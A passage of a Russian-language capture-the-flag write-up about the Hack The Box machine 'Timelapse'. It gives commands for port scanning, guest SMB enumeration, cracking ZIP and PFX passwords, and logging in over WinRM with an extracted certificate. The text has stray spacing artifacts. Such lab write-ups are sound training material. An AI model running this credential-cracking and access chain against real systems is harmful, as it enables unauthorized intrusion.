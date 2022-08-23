В этом рай­тапе мы с тобой взло­маем лег­кую по уров­ню слож­ности машину на Windows: порабо­таем с сер­тифика­тами для служ­бы WinRM, а так­же с LAPS — что­бы повысить при­виле­гии.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts , что­бы было удоб­нее обра­щать­ся к ней:

10. 10. 11. 152 timelapse. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та. #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Мы наш­ли мно­го откры­тых пор­тов:

53 — служ­ба DNS;

88 — служ­ба авто­риза­ции Kerberos;

135 — служ­ба уда­лен­ного вызова про­цедур (Microsoft RPC);

139 — служ­ба имен NetBIOS;

389, 636, 3268, 3269 — служ­ба LDAP;

445 — служ­ба SMB;

464 — служ­ба сме­ны пароля Kerberos;

593 — служ­ба уда­лен­ного вызова про­цедур (Microsoft RPC над HTTPS);

5986 — служ­ба уда­лен­ного управле­ния Windows (WinRM).

Порт 445 — SMB

Сра­зу про­ведем базовую раз­ведку SMB. Прос­тым под­клю­чени­ем с помощью CrackMapExec узна­ем вер­сию опе­раци­онной сис­темы и имя хос­та.

cme smb 10. 10. 11. 152

Так­же сто­ит поп­робовать под­клю­чение от име­ни гос­тя (ано­ним­ную авто­риза­цию).

cme smb 10. 10. 11. 152 -u guest -p '' --shares

И находим дос­тупную для чте­ния дирек­торию Shares .

Точка входа

Под­клю­чим­ся к это­му ресур­су с помощью ути­литы smbclient из пакета скрип­тов impacket и прос­мотрим дос­тупные фай­лы (при зап­росе пароля ничего не вво­дим).

smbclient. py guest@10. 10. 11. 152 use Shares ls

В катало­ге Dev най­дем архив ZIP.

cd Dev ls

Ска­чива­ем его коман­дой get , а при попыт­ке рас­паковать у нас зап­росят пароль.

Па­роль не проб­лема, если он сла­бый, так как его мож­но переб­рать. Для перебо­ра будем исполь­зовать ути­литу fcrackzip.

fcrackzip -v -D -u winrm_ backup. zip -p rockyou. txt

В архи­ве находим файл .pfx — сер­тификат в фор­мате PKCS#12. При попыт­ке открыть и прос­мотреть его у нас сно­ва зап­рашива­ют пароль.

Точка опоры

Бу­дем наде­ять­ся, что и тут исполь­зует­ся сла­бый пароль. Мож­но пре­обра­зовать файл в фор­мат прог­раммы John The Ripper — прод­винуто­го брут­форсе­ра хешей. Вмес­те с «Джо­ном» обыч­но пос­тавля­ется ре­пози­торий скрип­тов для пре­обра­зова­ния хешей из раз­ных фор­матов фай­лов в понима­емый брут­форсе­ром фор­мат. В дан­ном слу­чае нам нужен скрипт pfx2john .

/ usr/ share/ john/ pfx2john. py legacyy_ dev_ auth. crt

Сох­раним хеш в файл и переда­дим на перебор. В качес­тве сло­варя будем исполь­зовать зна­мени­тый rockyou.

john --wordlist = . / rockyou. txt pfx. hash

Те­перь, ког­да мы получи­ли пароль от сер­тифика­та PFX, нам нуж­но извлечь из него отдель­но сер­тификат и отдель­но ключ. Для это­го вос­поль­зуем­ся ути­литой OpenSSL, которой нуж­но ука­зать:

фор­мат фай­ла и сам вход­ной файл (параметр -in );

); имя фай­ла, в который записать резуль­тат (параметр -out );

); па­рамет­ры (для клю­ча -nocerts , а для получе­ния сер­тифика­та -clcerts и -nokeys ).

openssl pkcs12 -in legacyy_ dev_ auth. pfx -nocerts -out key. pem -nodes

openssl pkcs12 -in legacyy_ dev_ auth. pfx -clcerts -nokeys -out cert. crt -nodes

Те­перь нам нуж­но очис­тить фай­лы клю­ча и сер­тифика­та. Для это­го оста­вим в фай­лах толь­ко дан­ные пос­ле -----BEGIN . Теперь у нас все готово, что­бы под­клю­чить­ся к служ­бе WinRM по сер­тифика­ту. Для это­го исполь­зуем кру­тую ути­литу Evil-WinRM.

evil- winrm -S -k . / clear_ key. pem -c . / clear_ cert. crt -i 10. 10. 11. 152

Продвижение

Пер­вым делом получим информа­цию о текущем поль­зовате­ле. Это поможет более точ­но понять кон­текст, в котором мы работа­ем.